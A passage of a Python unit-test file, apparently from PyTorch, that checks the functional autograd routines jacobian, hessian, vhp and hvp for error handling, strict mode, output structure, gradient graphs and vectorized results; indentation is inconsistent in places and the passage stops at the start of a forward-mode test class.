with self.assertRaisesRegex(RuntimeError, "jacobian of the user-provided function is independent of input 0."):
res = autogradF.jacobian(foo, inp, create_graph=True, strict=True)
res = autogradF.jacobian(foo, inp, create_graph=True, strict=False)
self._assert_interleaved_struct(res, inp, inp)
self.assertEqual(res, torch.eye(4))
def test_jacobian_err_check_strict_vectorize(self):
def foo(x):
return x
inp = torch.rand(4)
with self.assertRaisesRegex(RuntimeError, "not supported together"):
res = autogradF.jacobian(foo, inp, strict=True, vectorize=True)
    def test_jacobian_no_grad(self):
        """jacobian under torch.no_grad(): the result is detached unless
        create_graph=True, and is still computed (non-zero) either way."""
        def exp_reducer(x):
            return x.exp().sum(dim=1)
        inputs = torch.rand(4, 4)
        with torch.no_grad():
            res = autogradF.jacobian(exp_reducer, inputs)
        self.assertIsNone(res.grad_fn)
        self.assertNotEqual(res, torch.zeros(4, 4))
        with torch.no_grad():
            res = autogradF.jacobian(exp_reducer, inputs, create_graph=True)
        self.assertIsNotNone(res.grad_fn)
        self.assertNotEqual(res, torch.zeros(4, 4))
    def _test_jacobian_output(self, vectorize):
        """Check jacobian's output structure and values for single-input,
        identity, and multi-input functions; results must be detached."""
        def exp_reducer(x):
            return x.exp().sum(dim=1)
        inputs = torch.rand(4, 4)
        res = autogradF.jacobian(exp_reducer, inputs, vectorize=vectorize)
        self._assert_interleaved_struct(res, exp_reducer(inputs), inputs)
        self.assertIsNone(res.grad_fn)
        def identity(x):
            return x.clone()
        inputs = torch.rand(4)
        res = autogradF.jacobian(identity, inputs, vectorize=vectorize)
        self._assert_interleaved_struct(res, identity(inputs), inputs)
        self.assertIsNone(res.grad_fn)
        # The jacobian of the identity is the identity matrix.
        self.assertEqual(res, torch.eye(4))
        def add_exp_reducer(x, y):
            return (x + y.exp()).sum(dim=1)
        inputs = (torch.rand(4, 4), torch.rand(4, 4))
        res = autogradF.jacobian(add_exp_reducer, inputs, vectorize=vectorize)
        self._assert_interleaved_struct(res, add_exp_reducer(*inputs), inputs)
        self.assertIsNone(res[0].grad_fn)
        self.assertIsNone(res[1].grad_fn)
def test_jacobian_output(self):
self._test_jacobian_output(vectorize=False)
def test_jacobian_output_vectorize(self):
self._test_jacobian_output(vectorize=True)
    def _test_jacobian_scalar(self, vectorize):
        """jacobian with a scalar output (result matches the input's struct)
        and with a scalar input (result matches the output's struct)."""
        def reducer(x):
            return x.sum()
        inputs = torch.rand(4, 4)
        res = autogradF.jacobian(reducer, inputs, vectorize=vectorize)
        self._assert_same_struct(res, inputs)
        def expander(x):
            return x.unsqueeze(0).repeat(4)
        inputs = torch.rand([])
        res = autogradF.jacobian(expander, inputs, vectorize=vectorize)
        self._assert_same_struct(res, torch.zeros(4))
def test_jacobian_scalar(self):
self._test_jacobian_scalar(vectorize=False)
def test_jacobian_scalar_vectorize(self):
self._test_jacobian_scalar(vectorize=True)
    def _test_jacobian_create_graph(self, vectorize):
        """With create_graph=True the jacobian itself is differentiable: check
        grad_fn is set and run gradcheck/gradgradcheck through the jacobian,
        including a function that computes a jacobian internally."""
        def exp_reducer(x):
            return x.exp().sum(dim=1)
        inputs = torch.rand(4, 4, dtype=torch.double, requires_grad=True)
        res = autogradF.jacobian(exp_reducer, inputs, create_graph=True, vectorize=vectorize)
        self._assert_interleaved_struct(res, exp_reducer(inputs), inputs)
        self.assertIsNotNone(res.grad_fn)
        gradcheck(lambda inp: autogradF.jacobian(exp_reducer, inp, create_graph=True, vectorize=vectorize), inputs)
        gradgradcheck(lambda inp: autogradF.jacobian(exp_reducer, inp, create_graph=True, vectorize=vectorize), inputs)
        def add_exp_reducer(x, y):
            return (x + y).exp().sum(dim=1)
        inputs = (torch.rand(4, 4, dtype=torch.double, requires_grad=True),
                  torch.rand(4, 4, dtype=torch.double, requires_grad=True))
        res = autogradF.jacobian(add_exp_reducer, inputs, create_graph=True, vectorize=vectorize)
        self._assert_interleaved_struct(res, add_exp_reducer(*inputs), inputs)
        self.assertIsNotNone(res[0].grad_fn)
        self.assertIsNotNone(res[1].grad_fn)
        gradcheck(lambda *inp: autogradF.jacobian(add_exp_reducer, inp, create_graph=True, vectorize=vectorize), inputs)
        gradgradcheck(lambda *inp: autogradF.jacobian(add_exp_reducer, inp, create_graph=True, vectorize=vectorize), inputs)
        def foo(x, y):
            x = x.cos()
            val, jac = autogradF.jacobian(add_exp_reducer, (x, y), create_graph=True, vectorize=vectorize)
            res = val[0].exp().sum() + val[1].exp().sum() + jac[0].exp().sum()
            res = res + jac[1].exp().sum() + x.exp().sum() + y.exp().sum()
            return res
        gradcheck(foo, inputs)
        gradgradcheck(foo, inputs)
def test_jacobian_create_graph(self):
self._test_jacobian_create_graph(vectorize=False)
def test_jacobian_create_graph_vectorize(self):
self._test_jacobian_create_graph(vectorize=True)
def _check_jacobian_vectorize_correctness(self, f, inputs):
expected = autogradF.jacobian(f, inputs, vectorize=False)
result = autogradF.jacobian(f, inputs, vectorize=True)
self.assertEqual(result, expected)
def test_jacobian_vectorize_correctness_simple(self):
def f(x):
return 3 * x ** 2
x = torch.randn(2, 3, 5)
self._check_jacobian_vectorize_correctness(f, x)
def test_jacobian_vectorize_correctness_multi_input(self):
def f(x, y):
return (x.cos() * x) @ y.sin()
x = torch.randn(2, 3)
y = torch.randn(3, 5)
self._check_jacobian_vectorize_correctness(f, (x, y))
def test_jacobian_vectorize_correctness_multi_input_multi_output(self):
def f(x, y):
return (x * x) @ y, x @ (x.sum(1) * y), y.sum()
x = torch.randn(5, 3)
y = torch.randn(3, 5)
self._check_jacobian_vectorize_correctness(f, (x, y))
def test_jacobian_vectorize_correctness_unrelated_outputs(self):
def f(x, y):
return x, y, x, y
x = torch.randn(2)
y = torch.randn(3)
self._check_jacobian_vectorize_correctness(f, (x, y))
    def test_jacobian_vectorize_correctness_zero_dim(self):
        """Vectorized jacobian with zero-dim outputs and/or zero-dim inputs."""
        # zero-dim output
        def f(x, y):
            return x.sum(), y.sum(), x * y
        x = torch.randn(3)
        y = torch.randn(3)
        self._check_jacobian_vectorize_correctness(f, (x, y))
        # zero-dim input
        def g(x):
            return torch.stack([x, x, x])
        x = torch.randn([])
        self._check_jacobian_vectorize_correctness(g, x)
        # Mixed zero-dim input / zero-dim output
        def h(x, y):
            return y.sum(), x * y
        x = torch.randn([])
        y = torch.randn(1)
        self._check_jacobian_vectorize_correctness(h, (x, y))
    @unittest.skipIf(not TEST_CUDA, "test requires CUDA")
    def test_jacobian_vectorize_correctness_different_devices(self):
        """Vectorized jacobian with outputs on different devices (CPU + CUDA)."""
        def f(x, y):
            return x * y, (x * y).cuda()
        x = torch.randn(3)
        y = torch.randn(3)
        self._check_jacobian_vectorize_correctness(f, (x, y))
def test_jacobian_vectorize_correctness_different_dtype(self):
def f(x, y):
return (x * y).float(), (x * y).double()
x = torch.randn(3)
y = torch.randn(3)
self._check_jacobian_vectorize_correctness(f, (x, y))
def _check_hessian_vectorize_correctness(self, f, inputs):
expected = autogradF.hessian(f, inputs, vectorize=False)
result = autogradF.hessian(f, inputs, vectorize=True)
self.assertEqual(result, expected)
def test_hessian_vectorize_correctness_simple(self):
def f(x):
return (3 * x ** 2).sum()
x = torch.randn(2, 3, 5)
self._check_hessian_vectorize_correctness(f, x)
def test_hessian_vectorize_correctness_multi_input(self):
def f(x, y, z):
return ((x.relu() * x) @ y.sin() @ z).sum()
x = torch.randn(2, 3)
y = torch.randn(3, 5)
z = torch.randn(5, 5)
self._check_hessian_vectorize_correctness(f, (x, y, z))
    def test_hessian_vectorize_correctness_unrelated_outputs(self):
        """Vectorized hessian when the output ignores some or all inputs."""
        # output unrelated to one input
        def f(x, y):
            return (x ** 2).sum()
        x = torch.randn(2)
        y = torch.randn(3)
        self._check_hessian_vectorize_correctness(f, (x, y))
        # output unrelated to all inputs
        def f(x, y):
            return torch.randn([])
        x = torch.randn(2)
        y = torch.randn(3)
        self._check_hessian_vectorize_correctness(f, (x, y))
    def _test_hessian_err_check(self, vectorize):
        """Check hessian's error messages (non-Tensor input, non-Tensor output,
        non-scalar output, multiple outputs), then its normal operation."""
        def foo(a):
            return 3 * a.narrow(0, 0, 3).exp().sum()
        def bar(a):
            return 3 * a.narrow(0, 0, 3), "bar"
        def bar2(a):
            return 3 * a.narrow(0, 0, 3)
        def bar3(a):
            return 3 * a.narrow(0, 0, 3), 3 * a.narrow(0, 0, 3)
        inp = torch.rand(4)
        with self.assertRaisesRegex(TypeError, "The inputs given to hessian must be either a Tensor"):
            res = autogradF.hessian(foo, (inp, 2), vectorize=vectorize)
        with self.assertRaisesRegex(TypeError, "The outputs of the user-provided function given to hessian must"):
            res = autogradF.hessian(bar, inp, vectorize=vectorize)
        err_msg_out = "The Tensor returned by the function given to hessian should contain a single element"
        with self.assertRaisesRegex(RuntimeError, err_msg_out):
            res = autogradF.hessian(bar2, inp, vectorize=vectorize)
        with self.assertRaisesRegex(RuntimeError, "The function given to hessian should return a single Tensor"):
            res = autogradF.hessian(bar3, inp, vectorize=vectorize)
        res = autogradF.hessian(foo, inp, vectorize=vectorize)
        self._assert_interleaved_struct(res, inp, inp)
        def foo(a, b):
            return (3 * b.narrow(0, 0, 3) * a.narrow(0, 0, 3)).sum()
        inp = (torch.rand(4), torch.rand(5))
        res = autogradF.hessian(foo, inp, vectorize=vectorize)
        self._assert_interleaved_struct(res, inp, inp)
def test_hessian_err_check(self):
self._test_hessian_err_check(vectorize=False)
def test_hessian_err_check_vectorize(self):
self._test_hessian_err_check(vectorize=True)
    def test_hessian_err_check_strict(self):
        """strict=True raises for detached/disconnected/linear outputs;
        strict=False returns an all-zero hessian instead."""
        def foo(a):
            return a.detach().sum()
        def bar(a):
            # Make a non-leaf Tensor that requires_grad but that is not connected to the input
            return a.long().float().requires_grad_().clone().sum()
        def bar2(a):
            # A Linear function for which the jacobian is independent of the input
            return (3 * a).sum()
        inp = torch.rand(4)
        with self.assertRaisesRegex(RuntimeError, "Output 0 of the user-provided function does not require gradients."):
            res = autogradF.hessian(foo, inp, strict=True)
        res = autogradF.hessian(foo, inp, strict=False)
        self._assert_interleaved_struct(res, inp, inp)
        self.assertEqual(res.abs().sum(), 0.)
        with self.assertRaisesRegex(RuntimeError, "jacobian of the user-provided function with respect to input 0"):
            res = autogradF.hessian(bar, inp, strict=True)
        res = autogradF.hessian(bar, inp, strict=False)
        self._assert_interleaved_struct(res, inp, inp)
        self.assertEqual(res.abs().sum(), 0.)
        with self.assertRaisesRegex(RuntimeError, "jacobian of the user-provided function with respect to input 0 is"):
            res = autogradF.hessian(bar2, inp, strict=True)
        res = autogradF.hessian(bar2, inp, strict=False)
        self._assert_interleaved_struct(res, inp, inp)
        self.assertEqual(res.abs().sum(), 0.)
def test_hessian_err_check_strict_vectorize(self):
def foo(x):
return (x ** 3).sum()
inp = torch.rand(4)
with self.assertRaisesRegex(RuntimeError, "not supported together"):
res = autogradF.hessian(foo, inp, strict=True, vectorize=True)
    def test_hessian_no_grad(self):
        """hessian under torch.no_grad(): detached unless create_graph=True."""
        def pow_reducer(x):
            return x.pow(3).sum()
        inputs = torch.rand(2, 2)
        with torch.no_grad():
            res = autogradF.hessian(pow_reducer, inputs)
        self.assertIsNone(res[0][0].grad_fn)
        self.assertIsNone(res[0][1].grad_fn)
        self.assertIsNone(res[1][0].grad_fn)
        self.assertIsNone(res[1][1].grad_fn)
        self.assertNotEqual(res, torch.zeros(2, 2, 2))
        with torch.no_grad():
            res = autogradF.hessian(pow_reducer, inputs, create_graph=True)
        self.assertIsNotNone(res[0][0].grad_fn)
        self.assertIsNotNone(res[0][1].grad_fn)
        self.assertIsNotNone(res[1][0].grad_fn)
        self.assertIsNotNone(res[1][1].grad_fn)
        self.assertNotEqual(res, torch.zeros(2, 2, 2))
    def _test_hessian_output(self, vectorize):
        """Check hessian output structure for single and tuple inputs;
        results must be detached."""
        def pow_reducer(x):
            return x.pow(3).sum()
        inputs = torch.rand(2, 2)
        res = autogradF.hessian(pow_reducer, inputs, vectorize=vectorize)
        self._assert_interleaved_struct(res, inputs, inputs)
        self.assertIsNone(res.grad_fn)
        def add_pow_reducer(x, y):
            return (x + y).pow(3).sum()
        inputs = (torch.rand(2, 2), torch.rand(2, 2))
        res = autogradF.hessian(add_pow_reducer, inputs, vectorize=vectorize)
        self._assert_interleaved_struct(res, inputs, inputs)
        self.assertIsNone(res[0][0].grad_fn)
        self.assertIsNone(res[0][1].grad_fn)
        self.assertIsNone(res[1][0].grad_fn)
        self.assertIsNone(res[1][1].grad_fn)
def test_hessian_output(self):
self._test_hessian_output(vectorize=False)
def test_hessian_output_vectorize(self):
self._test_hessian_output(vectorize=True)
    def _test_hessian_scalar(self, vectorize):
        """hessian with a matrix input, a scalar input, and an output that
        must be reshaped down to a scalar."""
        def reducer(x):
            return x.sum()
        inputs = torch.rand(4, 4)
        res = autogradF.hessian(reducer, inputs, vectorize=vectorize)
        self._assert_interleaved_struct(res, inputs, inputs)
        inputs = torch.rand([])
        res = autogradF.hessian(reducer, inputs, vectorize=vectorize)
        self._assert_same_struct(res, inputs)
        def bad_reducer(x):
            return x.sum().view(1, 1, 1)
        inputs = torch.rand(4, 4)
        res = autogradF.hessian(bad_reducer, inputs, vectorize=vectorize)
        self._assert_interleaved_struct(res, inputs, inputs)
def test_hessian_scalar(self):
return self._test_hessian_scalar(vectorize=False)
def test_hessian_scalar_vectorize(self):
return self._test_hessian_scalar(vectorize=True)
    def _test_hessian_create_graph(self, vectorize):
        """With create_graph=True the hessian is differentiable: check grad_fn
        and run gradcheck/gradgradcheck through the hessian, including a
        function that computes a hessian internally."""
        def pow_reducer(x):
            return x.pow(3).sum()
        inputs = torch.rand(2, 2, dtype=torch.double, requires_grad=True)
        res = autogradF.hessian(pow_reducer, inputs, create_graph=True, vectorize=vectorize)
        self._assert_interleaved_struct(res, inputs, inputs)
        self.assertIsNotNone(res.grad_fn)
        gradcheck(lambda inp: autogradF.hessian(pow_reducer, inp, create_graph=True, vectorize=vectorize), inputs)
        gradgradcheck(lambda inp: autogradF.hessian(pow_reducer, inp, create_graph=True, vectorize=vectorize), inputs)
        def add_pow_reducer(x, y):
            return (x + y).pow(3).sum()
        inputs = (torch.rand(2, 2, dtype=torch.double, requires_grad=True),
                  torch.rand(2, 2, dtype=torch.double, requires_grad=True))
        res = autogradF.hessian(add_pow_reducer, inputs, create_graph=True, vectorize=vectorize)
        self._assert_interleaved_struct(res, inputs, inputs)
        self.assertIsNotNone(res[0][0].grad_fn)
        self.assertIsNotNone(res[0][1].grad_fn)
        self.assertIsNotNone(res[1][0].grad_fn)
        self.assertIsNotNone(res[1][1].grad_fn)
        # gradcheck needs a flat tuple of Tensors, not a tuple of tuples.
        def flatten(inp):
            return tuple(el_lvl2 for el_lvl1 in inp for el_lvl2 in el_lvl1)
        gradcheck(lambda *inp: flatten(autogradF.hessian(add_pow_reducer, inp, create_graph=True, vectorize=vectorize)), inputs)
        gradgradcheck(lambda *inp: flatten(autogradF.hessian(add_pow_reducer, inp, create_graph=True, vectorize=vectorize)), inputs)
        def foo(x, y):
            x = x.cos()
            val, hess = autogradF.hessian(add_pow_reducer, (x, y), create_graph=True, vectorize=vectorize)
            res = val[0].cos().sum() + val[1].cos().sum() + hess[0].cos().sum()
            res = res + hess[1].cos().sum() + x.cos().sum() + y.cos().sum()
            return res
        gradcheck(foo, inputs)
        gradgradcheck(foo, inputs)
def test_hessian_create_graph(self):
self._test_hessian_create_graph(vectorize=False)
def test_hessian_create_graph_vectorize(self):
self._test_hessian_create_graph(vectorize=True)
    def test_vhp_err_check(self):
        """Validate vhp's error messages (inputs, outputs, scalar-output check,
        v size and type), then its result structure for single/tuple inputs."""
        def foo(a):
            return 3 * a.narrow(0, 0, 3).exp().sum()
        def bar(a):
            return 3 * a.narrow(0, 0, 3), "bar"
        def bar2(a):
            return 3 * a.narrow(0, 0, 3)
        inp = torch.rand(4)
        v = torch.rand(4)
        with self.assertRaisesRegex(TypeError, "The inputs given to vhp must be either a Tensor"):
            res = autogradF.vhp(foo, (inp, 2), v)
        with self.assertRaisesRegex(TypeError, "The outputs of the user-provided function given to vhp must"):
            res = autogradF.vhp(bar, inp, v)
        err_msg_out = "The Tensor returned by the function given to vhp should contain a single element"
        with self.assertRaisesRegex(RuntimeError, err_msg_out):
            res = autogradF.vhp(bar2, inp, v)
        with self.assertRaisesRegex(RuntimeError, "v has invalid size:"):
            res = autogradF.vhp(foo, inp, torch.rand(5))
        with self.assertRaisesRegex(TypeError, "The v given to vhp must be either a Tensor or a tuple of Tensors"):
            res = autogradF.vhp(foo, inp, (v, 2))
        res = autogradF.vhp(foo, inp, v)
        self._assert_same_struct(res[1], inp)
        def foo(a, b):
            return (3 * b.narrow(0, 0, 3) * a.narrow(0, 0, 3)).sum()
        inp = (torch.rand(4), torch.rand(5))
        v = (torch.rand(4), torch.rand(5))
        res = autogradF.vhp(foo, inp, v)
        self._assert_same_struct(res[1], inp)
    def test_vhp_err_check_strict(self):
        """strict=True raises for detached/disconnected/linear outputs;
        strict=False returns a zero vhp instead."""
        def foo(a):
            return a.detach().sum()
        def bar(a):
            # Make a non-leaf Tensor that requires_grad but that is not connected to the input
            return a.long().float().requires_grad_().clone().sum()
        def bar2(a):
            # A Linear function for which the jacobian is independent of the input
            return (3 * a).sum()
        inp = torch.rand(4)
        v = torch.rand(4)
        with self.assertRaisesRegex(RuntimeError, "Output 0 of the user-provided function does not require gradients."):
            res = autogradF.vhp(foo, inp, v, strict=True)
        res = autogradF.vhp(foo, inp, v, strict=False)
        self._assert_same_struct(res[1], inp)
        self.assertEqual(res[1].abs().sum(), 0.)
        with self.assertRaisesRegex(RuntimeError, "The output of the user-provided function is independent of input 0"):
            res = autogradF.vhp(bar, inp, v, strict=True)
        res = autogradF.vhp(bar, inp, v, strict=False)
        self._assert_same_struct(res[1], inp)
        self.assertEqual(res[1].abs().sum(), 0.)
        with self.assertRaisesRegex(RuntimeError, "jacobian of the user-provided function with respect to input 0 is"):
            res = autogradF.vhp(bar2, inp, v, strict=True)
        res = autogradF.vhp(bar2, inp, v, strict=False)
        self._assert_same_struct(res[1], inp)
        self.assertEqual(res[1].abs().sum(), 0.)
    def test_vhp_no_grad(self):
        """vhp under torch.no_grad(): detached unless create_graph=True."""
        def reducer(x):
            return x.exp().sum()
        inputs = torch.rand(4, 4)
        v = torch.ones(4, 4)
        with torch.no_grad():
            res = autogradF.vhp(reducer, inputs, v)
        self.assertIsNone(res[0].grad_fn)
        self.assertIsNone(res[1].grad_fn)
        self.assertNotEqual(res[1], torch.zeros(4, 4))
        with torch.no_grad():
            res = autogradF.vhp(reducer, inputs, v, create_graph=True)
        self.assertIsNotNone(res[0].grad_fn)
        self.assertIsNotNone(res[1].grad_fn)
        self.assertNotEqual(res[1], torch.zeros(4, 4))
    def test_vhp_output(self):
        """vhp result structure for single and tuple inputs; outputs detached."""
        def foo(a):
            return 3 * a.narrow(0, 0, 3).exp().sum()
        inputs = torch.rand(4, 4)
        v = torch.ones(4, 4)
        res = autogradF.vhp(foo, inputs, v)
        self._assert_same_struct(res[1], inputs)
        self.assertIsNone(res[0].grad_fn)
        self.assertIsNone(res[1].grad_fn)
        def bar(a, b):
            return (a + 3 * b.narrow(0, 0, 3)).exp().sum()
        inputs = (torch.rand(3), torch.rand(4))
        v = (torch.ones(3), torch.ones(4))
        out, vhp_val = autogradF.vhp(bar, inputs, v)
        self._assert_same_struct(vhp_val, inputs)
        self.assertIsNone(out.grad_fn)
        self.assertIsNone(vhp_val[0].grad_fn)
        self.assertIsNone(vhp_val[1].grad_fn)
    def test_vhp_scalar(self):
        """vhp with scalar inputs, an omitted v, and an output that must be
        reshaped down to a scalar."""
        def reducer(x):
            return x.sum()
        inputs = torch.rand(4, 4)
        v = torch.ones(4, 4)
        res = autogradF.vhp(reducer, inputs, v)
        self._assert_same_struct(res[1], inputs)
        inputs = torch.rand([])
        v = torch.rand([])
        res = autogradF.vhp(reducer, inputs, v)
        self._assert_same_struct(res[1], inputs)
        # v omitted here: presumably only valid for single-element inputs —
        # confirm against autogradF.vhp's default-v handling.
        res = autogradF.vhp(reducer, inputs)
        self._assert_same_struct(res[1], inputs)
        def bad_reducer(x):
            return x.sum().view(1, 1, 1)
        inputs = torch.rand(4, 4)
        v = torch.rand(4, 4)
        res = autogradF.vhp(bad_reducer, inputs, v)
        self._assert_same_struct(res[1], inputs)
    def test_vhp_create_graph(self):
        """With create_graph=True vhp is differentiable: gradcheck and
        gradgradcheck through vhp, including vhp nested in another function."""
        def foo(a):
            return 3 * a.narrow(0, 0, 3).exp().sum()
        inputs = torch.rand(4, 4, dtype=torch.double, requires_grad=True)
        v = torch.ones(4, 4, dtype=torch.double, requires_grad=True)
        res = autogradF.vhp(foo, inputs, v, create_graph=True)
        self._assert_same_struct(res[1], inputs)
        self.assertIsNotNone(res[0].grad_fn)
        self.assertIsNotNone(res[1].grad_fn)
        gradcheck(lambda inp, v: autogradF.vhp(foo, inp, v, create_graph=True), (inputs, v))
        gradgradcheck(lambda inp, v: autogradF.vhp(foo, inp, v, create_graph=True), (inputs, v))
        def bar(a, b):
            return (a + 3 * b.narrow(0, 0, 3)).exp().sum()
        inputs = (torch.rand(3, dtype=torch.double, requires_grad=True),
                  torch.rand(4, dtype=torch.double, requires_grad=True))
        v = (torch.ones(3, dtype=torch.double, requires_grad=True),
             torch.ones(4, dtype=torch.double, requires_grad=True))
        out, vhp_val = autogradF.vhp(bar, inputs, v, create_graph=True)
        self._assert_same_struct(vhp_val, inputs)
        self.assertIsNotNone(out.grad_fn)
        self.assertIsNotNone(vhp_val[0].grad_fn)
        self.assertIsNotNone(vhp_val[1].grad_fn)
        gradcheck(lambda *args: autogradF.vhp(bar, args[:2], args[2:], create_graph=True)[1], inputs + v)
        gradgradcheck(lambda *args: autogradF.vhp(bar, args[:2], args[2:], create_graph=True)[1], inputs + v)
        def foo(*args):
            x, y = args[:2]
            v = args[2:]
            x = x.cos()
            val, grad = autogradF.vhp(bar, (x, y), v, create_graph=True)
            return val.cos() + grad[0].cos().sum() + grad[1].cos() + x.cos().sum() + y.cos()
        gradcheck(foo, inputs + v)
        gradgradcheck(foo, inputs + v)
def test_hvp_err_check(self):
def foo(a):
return 3 * a.narrow(0, 0, 3).exp().sum()
def bar(a):
return 3 * a.narrow(0, 0, 3), "bar"
def bar2(a):
return 3 * a.narrow(0, 0, 3)
inp = torch.rand(4)
v = torch.rand(4)
res = autogradF.hvp(foo, inp, v)
with self.assertRaisesRegex(TypeError, "The inputs given to hvp must be either a Tensor"):
res = autogradF.hvp(foo, (inp, 2), v)
with self.assertRaisesRegex(TypeError, "The outputs of the user-provided function given to hvp must"):
res = autogradF.hvp(bar, inp, v)
err_msg_out = "The Tensor returned by the function given to hvp should contain a single element"
with self.assertRaisesRegex(RuntimeError, err_msg_out):
res = autogradF.hvp(bar2, inp, v)
with self.assertRaisesRegex(RuntimeError, "v has invalid size:"):
res = autogradF.hvp(foo, inp, torch.rand(5))
with self.assertRaisesRegex(TypeError, "The v given to hvp must be either a Tensor or a tuple of Tensors"):
res = autogradF.hvp(foo, inp, (v, 2))
res = autogradF.hvp(foo, inp, v)
self._assert_same_struct(res[1], inp)
def foo(a, b):
return (3 * b.narrow(0, 0, 3) * a.narrow(0, 0, 3)).sum()
inp = (torch.rand(4), torch.rand(5))
v = (torch.rand(4), torch.rand(5))
res = autogradF.hvp(foo, inp, v)
self._assert_same_struct(res[1], inp)
    def test_hvp_err_check_strict(self):
        """strict=True raises for detached/disconnected/linear outputs;
        strict=False returns a zero hvp instead."""
        def foo(a):
            return a.detach().sum()
        def bar(a):
            # Make a non-leaf Tensor that requires_grad but that is not connected to the input
            return a.long().float().requires_grad_().clone().sum()
        def bar2(a):
            # A Linear function for which the jacobian is independent of the input
            return (3 * a).sum()
        inp = torch.rand(4)
        v = torch.rand(4)
        with self.assertRaisesRegex(RuntimeError, "Output 0 of the user-provided function does not require gradients."):
            res = autogradF.hvp(foo, inp, v, strict=True)
        res = autogradF.hvp(foo, inp, v, strict=False)
        self._assert_same_struct(res[1], inp)
        self.assertEqual(res[1].abs().sum(), 0.)
        with self.assertRaisesRegex(RuntimeError, "The output of the user-provided function is independent of input 0"):
            res = autogradF.hvp(bar, inp, v, strict=True)
        res = autogradF.hvp(bar, inp, v, strict=False)
        self._assert_same_struct(res[1], inp)
        self.assertEqual(res[1].abs().sum(), 0.)
        with self.assertRaisesRegex(RuntimeError, "jacobian of the user-provided function with respect to input 0 is"):
            res = autogradF.hvp(bar2, inp, v, strict=True)
        res = autogradF.hvp(bar2, inp, v, strict=False)
        self._assert_same_struct(res[1], inp)
        self.assertEqual(res[1].abs().sum(), 0.)
    def test_hvp_no_grad(self):
        """hvp under torch.no_grad(): detached unless create_graph=True."""
        def reducer(x):
            return x.exp().sum()
        inputs = torch.rand(4, 4)
        v = torch.ones(4, 4)
        with torch.no_grad():
            res = autogradF.hvp(reducer, inputs, v)
        self.assertIsNone(res[0].grad_fn)
        self.assertIsNone(res[1].grad_fn)
        self.assertNotEqual(res[1], torch.zeros(4, 4))
        with torch.no_grad():
            res = autogradF.hvp(reducer, inputs, v, create_graph=True)
        self.assertIsNotNone(res[0].grad_fn)
        self.assertIsNotNone(res[1].grad_fn)
        self.assertNotEqual(res[1], torch.zeros(4, 4))
    def test_hvp_output(self):
        """hvp result structure for single and tuple inputs; outputs detached."""
        def foo(a):
            return 3 * a.narrow(0, 0, 3).exp().sum()
        inputs = torch.rand(4, 4)
        v = torch.ones(4, 4)
        res = autogradF.hvp(foo, inputs, v)
        self._assert_same_struct(res[1], inputs)
        self.assertIsNone(res[0].grad_fn)
        self.assertIsNone(res[1].grad_fn)
        def bar(a, b):
            return (a + 3 * b.narrow(0, 0, 3)).exp().sum()
        inputs = (torch.rand(3), torch.rand(4))
        v = (torch.ones(3), torch.ones(4))
        out, hvp_val = autogradF.hvp(bar, inputs, v)
        self._assert_same_struct(hvp_val, inputs)
        self.assertIsNone(out.grad_fn)
        self.assertIsNone(hvp_val[0].grad_fn)
        self.assertIsNone(hvp_val[1].grad_fn)
    def test_hvp_scalar(self):
        """hvp with scalar inputs, an omitted v, and an output that must be
        reshaped down to a scalar."""
        def reducer(x):
            return x.exp().sum()
        inputs = torch.rand(4, 4)
        v = torch.ones(4, 4)
        res = autogradF.hvp(reducer, inputs, v)
        self._assert_same_struct(res[1], inputs)
        inputs = torch.rand([])
        v = torch.rand([])
        res = autogradF.hvp(reducer, inputs, v)
        self._assert_same_struct(res[1], inputs)
        # v omitted here: presumably only valid for single-element inputs —
        # confirm against autogradF.hvp's default-v handling.
        res = autogradF.hvp(reducer, inputs)
        self._assert_same_struct(res[1], inputs)
        def bad_reducer(x):
            return x.exp().sum().view(1, 1, 1)
        inputs = torch.rand(4, 4)
        v = torch.rand(4, 4)
        res = autogradF.hvp(bad_reducer, inputs, v)
        self._assert_same_struct(res[1], inputs)
    def test_hvp_create_graph(self):
        """With create_graph=True hvp is differentiable: gradcheck and
        gradgradcheck through hvp, including hvp nested in another function."""
        def foo(a):
            return 3 * a.narrow(0, 0, 3).exp().sum()
        inputs = torch.rand(4, 4, dtype=torch.double, requires_grad=True)
        v = torch.ones(4, 4, dtype=torch.double, requires_grad=True)
        res = autogradF.hvp(foo, inputs, v, create_graph=True)
        self._assert_same_struct(res[1], inputs)
        self.assertIsNotNone(res[0].grad_fn)
        self.assertIsNotNone(res[1].grad_fn)
        gradcheck(lambda inp, v: autogradF.hvp(foo, inp, v, create_graph=True), (inputs, v))
        gradgradcheck(lambda inp, v: autogradF.hvp(foo, inp, v, create_graph=True), (inputs, v))
        def bar(a, b):
            return (a + 3 * b.narrow(0, 0, 3)).exp().sum()
        inputs = (torch.rand(3, dtype=torch.double, requires_grad=True),
                  torch.rand(4, dtype=torch.double, requires_grad=True))
        v = (torch.ones(3, dtype=torch.double, requires_grad=True),
             torch.ones(4, dtype=torch.double, requires_grad=True))
        out, hvp_val = autogradF.hvp(bar, inputs, v, create_graph=True)
        self._assert_same_struct(hvp_val, inputs)
        self.assertIsNotNone(out.grad_fn)
        self.assertIsNotNone(hvp_val[0].grad_fn)
        self.assertIsNotNone(hvp_val[1].grad_fn)
        gradcheck(lambda *args: autogradF.hvp(bar, args[:2], args[2:], create_graph=True)[1], inputs + v)
        gradgradcheck(lambda *args: autogradF.hvp(bar, args[:2], args[2:], create_graph=True)[1], inputs + v)
        def foo(*args):
            x, y = args[:2]
            v = args[2:]
            x = x.cos()
            val, grad = autogradF.hvp(bar, (x, y), v, create_graph=True)
            return val.cos() + grad[0].cos().sum() + grad[1].cos() + x.cos().sum() + y.cos()
        gradcheck(foo, inputs + v)
        gradgradcheck(foo, inputs + v)
def test_jacobian_match_vjp_jvp(self):
def foo(x):
return x ** 3 + x.sum()
inputs = torch.rand(4)
v = torch.rand(4)
jac = autogradF.jacobian(foo, inputs)
jvp = autogradF.jvp(foo, inputs, v)[1]
vjp = autogradF.vjp(foo, inputs, v)[1]
self.assertEqual(jvp, torch.mm(jac, v.unsqueeze(1)).squeeze(1))
self.assertEqual(vjp, torch.mm(v.unsqueeze(0), jac).squeeze(0))
def test_hessian_match_vhp_hvp(self):
def foo(a):
return 3 * a.narrow(0, 0, 3).exp().sum()
inputs = torch.rand(4)
v = torch.rand(4)
hes = autogradF.hessian(foo, inputs)
hvp = autogradF.hvp(foo, inputs, v)[1]
vhp = autogradF.vhp(foo, inputs, v)[1]
self.assertEqual(hvp, torch.mm(hes, v.unsqueeze(1)).squeeze(1))
self.assertEqual(vhp, torch.mm(v.unsqueeze(0), hes).squeeze(0))
class TestAutogradForwardMode(TestCase):
    def tearDown(self):
        # Ensure that a failing test won't make others fail: pop every
        # forward-AD dual level the test may have left open.
